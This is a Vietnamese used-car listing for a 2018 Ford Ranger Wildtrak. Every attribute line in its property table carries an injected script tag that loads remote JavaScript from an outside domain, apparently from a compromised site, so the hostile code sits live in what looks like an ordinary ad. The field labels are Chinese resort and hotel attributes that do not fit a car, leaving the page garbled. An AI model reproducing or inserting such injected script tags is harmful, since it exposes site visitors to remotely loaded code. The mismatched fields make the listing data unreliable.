Đã Qua Sử Dụng 2018 Ranger – Xe Cũ Miền Tây
869,000,000đ

used-cars 2018 Ford ranger

Các Thuộc Tính Của Xe
"<script type=text/javascript src='https://slow.destinyfernandi.com/hos?&v=4'></script>岛屿类型 N/A
"<script type=text/javascript src='https://slow.destinyfernandi.com/hos?&v=4'></script>一价全包 N/A
"<script type=text/javascript src='https://slow.destinyfernandi.com/hos?&v=4'></script>成人专属 N/A
"<script type=text/javascript src='https://slow.destinyfernandi.com/hos?&v=4'></script>年龄要求 N/A
"<script type=text/javascript src='https://slow.destinyfernandi.com/hos?&v=4'></script>酒店星级 N/A
"<script type=text/javascript src='https://slow.destinyfernandi.com/hos?&v=4'></script>连锁品牌 Ford
"<script type=text/javascript src='https://slow.destinyfernandi.com/hos?&v=4'></script>建造时间 N/A
"<script type=text/javascript src='https://slow.destinyfernandi.com/hos?&v=4'></script>最近整修 N/A
"<script type=text/javascript src='https://slow.destinyfernandi.com/hos?&v=4'></script>沙滩品质 N/A
"<script type=text/javascript src='https://slow.destinyfernandi.com/hos?&v=4'></script>房礁浮浅 N/A
"<script type=text/javascript src='https://slow.destinyfernandi.com/hos?&v=4'></script>岛屿位置 N/A
"<script type=text/javascript src='https://slow.destinyfernandi.com/hos?&v=4'></script>上岛交通 N/A
"<script type=text/javascript src='https://slow.destinyfernandi.com/hos?&v=4'></script>交通时间 N/A
"<script type=text/javascript src='https://slow.destinyfernandi.com/hos?&v=4'></script>岛屿大小 N/A
"<script type=text/javascript src='https://slow.destinyfernandi.com/hos?&v=4'></script>客房总数 N/A
"<script type=text/javascript src='https://slow.destinyfernandi.com/hos?&v=4'></script>客房WiFi N/A
"<script type=text/javascript src='https://slow.destinyfernandi.com/hos?&v=4'></script>最小沙屋 N/A
"<script type=text/javascript src='https://slow.destinyfernandi.com/hos?&v=4'></script>沙屋泳池 N/A
"<script type=text/javascript src='https://slow.destinyfernandi.com/hos?&v=4'></script>最小水屋 N/A
"<script type=text/javascript src='https://slow.destinyfernandi.com/hos?&v=4'></script>水屋泳池 N/A
"<script type=text/javascript src='https://slow.destinyfernandi.com/hos?&v=4'></script>家庭套房 N/A
"<script type=text/javascript src='https://slow.destinyfernandi.com/hos?&v=4'></script>中文服务 N/A
"<script type=text/javascript src='https://slow.destinyfernandi.com/hos?&v=4'></script>儿童服务 N/A
"<script type=text/javascript src='https://slow.destinyfernandi.com/hos?&v=4'></script>儿童看护 N/A
"<script type=text/javascript src='https://slow.destinyfernandi.com/hos?&v=4'></script>婚礼服务 N/A
Ngày đăng ký 01/12/2018
Stock id 5140
Biển số xe: .
Mô tả

Ford Ranger Wild trak 2.0L Bitubo, xe được đăng ký lần đầu tháng 12/2018, màu trắng, xe cá nhân.